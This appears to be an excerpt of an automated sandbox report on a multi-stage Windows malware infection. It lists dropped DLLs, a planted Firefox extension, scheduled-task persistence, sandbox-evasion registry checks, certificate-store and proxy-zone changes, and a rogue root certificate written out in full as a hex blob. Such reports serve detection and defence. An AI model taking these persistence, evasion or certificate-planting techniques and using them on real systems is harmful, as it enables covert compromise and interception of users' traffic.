File created C:\Program Files (x86)\tegRANPZONsU2\DxJwRzxeQcEBA.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\nFLFFjqrQPUn\tiGcxqN.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\FaxaBIX.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\Qgobkqe.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\qcQCdBm.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\xwzecB.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\0869e0ea89.exe N/A
File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
